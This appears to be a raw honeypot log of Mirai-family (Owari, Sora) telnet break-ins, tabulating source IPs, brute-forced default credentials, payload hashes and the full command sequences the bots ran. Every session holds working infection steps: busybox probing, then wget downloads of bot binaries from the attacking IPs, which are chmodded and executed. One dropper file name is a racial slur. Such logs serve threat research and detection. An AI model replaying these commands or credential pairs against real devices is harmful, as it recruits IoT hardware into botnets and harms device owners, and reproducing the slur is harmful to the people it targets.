| IP address |
User name |
Password |
SHA256 of the payload file |
 209.141.42.3
| default | OxhlwSG8 | 840a8872dbf0f62ebe7d0e5327043997325f7af4858eb4707395afa588db9ef3 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf cKbVkzGOPa AnCSYNtIaW
/bin/busybox cp /bin/busybox cKbVkzGOPa; >cKbVkzGOPa; /bin/busybox chmod 777 cKbVkzGOPa; /bin/busybox OWARI
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox OWARI
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox OWARI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox OWARI
/bin/busybox wget http://209.141.42.3:80/bins/owari.arm -O - > cKbVkzGOPa; /bin/busybox chmod 777 cKbVkzGOPa; /bin/busybox OWARI
./cKbVkzGOPa loader.wget; /bin/busybox IRAWO
/bin/busybox rm -rf AnCSYNtIaW cKbVkzGOPa
/bin/busybox cp /bin/busybox cKbVkzGOPa; >cKbVkzGOPa; /bin/busybox chmod 777 cKbVkzGOPa; /bin/busybox OWARI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox OWARI
/bin/busybox wget http://209.141.42.3:80/bins/owari.arm7 -O - > cKbVkzGOPa; /bin/busybox chmod 777 cKbVkzGOPa; /bin/busybox OWARI
./cKbVkzGOPa loader.wget; /bin/busybox IRAWO
/bin/busybox rm -rf AnCSYNtIaW; >cKbVkzGOPa; /bin/busybox OWARI |
 89.40.118.239
| daemon | | eb4bc66ceffc17b8307d9f1455acd1d9c37e8d3e6f6c369940d07183da0b9ef9 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf Slav3Th3seD3vices dropper
/bin/busybox cp /bin/busybox Slav3Th3seD3vices; >Slav3Th3seD3vices; /bin/busybox chmod 777 Slav3Th3seD3vices; /bin/busybox MACRO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox MACRO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox MACRO
/bin/busybox wget http://89.40.118.239:80/bins/sora.mips -O - > Slav3Th3seD3vices; /bin/busybox chmod 777 Slav3Th3seD3vices; /bin/busybox MACRO
./Slav3Th3seD3vices telnet.loader.mips; /bin/busybox BIGM3ME |
209.141.42.3 | root | hunt5759 | 4b975d72445fc76b1983c47b26b7723c4bf64f52c086ac831d50c66209c23580 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf cKbVkzGOPa AnCSYNtIaW
/bin/busybox cp /bin/busybox cKbVkzGOPa; >cKbVkzGOPa; /bin/busybox chmod 777 cKbVkzGOPa; /bin/busybox OWARI
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox OWARI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox OWARI
/bin/busybox wget http://209.141.42.3:80/bins/owari.sh4 -O - > cKbVkzGOPa; /bin/busybox chmod 777 cKbVkzGOPa; /bin/busybox OWARI
./cKbVkzGOPa loader.wget; /bin/busybox IRAWO
/bin/busybox rm -rf AnCSYNtIaW; >cKbVkzGOPa; /bin/busybox OWARI |
89.40.118.239 | admin | admin | 75047cb8fe7077373e7e3b952aec9e025583b9429e5a4362341cd7135d29dd83 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf Slav3Th3seD3vices dropper
/bin/busybox cp /bin/busybox Slav3Th3seD3vices; >Slav3Th3seD3vices; /bin/busybox chmod 777 Slav3Th3seD3vices; /bin/busybox MACRO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox MACRO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox MACRO
/bin/busybox wget http://89.40.118.239:80/bins/sora.spc -O - > Slav3Th3seD3vices; /bin/busybox chmod 777 Slav3Th3seD3vices; /bin/busybox MACRO
./Slav3Th3seD3vices telnet.loader.spc; /bin/busybox BIGM3ME |
159.65.38.248 | admin | admin1234 | 1a4c7cdc2f0fab45dd736fe79db6a61b283e313c77920da5c2ba1c9b271681b7 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://159.65.38.248:80/bins/sora.mips -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.mips; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA |
209.141.42.3 | admin | radius | 840a8872dbf0f62ebe7d0e5327043997325f7af4858eb4707395afa588db9ef3 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf cKbVkzGOPa AnCSYNtIaW
/bin/busybox cp /bin/busybox cKbVkzGOPa; >cKbVkzGOPa; /bin/busybox chmod 777 cKbVkzGOPa; /bin/busybox OWARI
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox OWARI
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox OWARI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox OWARI
/bin/busybox wget http://209.141.42.3:80/bins/owari.arm -O - > cKbVkzGOPa; /bin/busybox chmod 777 cKbVkzGOPa; /bin/busybox OWARI
./cKbVkzGOPa loader.wget; /bin/busybox IRAWO
/bin/busybox rm -rf AnCSYNtIaW cKbVkzGOPa
/bin/busybox cp /bin/busybox cKbVkzGOPa; >cKbVkzGOPa; /bin/busybox chmod 777 cKbVkzGOPa; /bin/busybox OWARI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox OWARI
/bin/busybox wget http://209.141.42.3:80/bins/owari.arm7 -O - > cKbVkzGOPa; /bin/busybox chmod 777 cKbVkzGOPa; /bin/busybox OWARI
./cKbVkzGOPa loader.wget; /bin/busybox IRAWO
/bin/busybox rm -rf AnCSYNtIaW; >cKbVkzGOPa; /bin/busybox OWARI |
 185.220.34.88
| support | support | 1e9e83e7525ca737af2bdf9a45882b37579db2ec33c1bd415025f14cc9664f67 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://185.220.34.88:80/bins/sora.sh4 -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.sh4; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA |
138.68.43.255 | root | pass | 19cc9abb3ba47f15791015a20f59ba98a0b4d802639d8c9cb0134e391eaec0fb |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://138.68.43.255:80/bins/sora.arm -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.arm; /bin/busybox BIGREP
/bin/busybox rm -rf dropper NiGGeR69xd
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://138.68.43.255:80/bins/sora.arm7 -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.arm7; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA |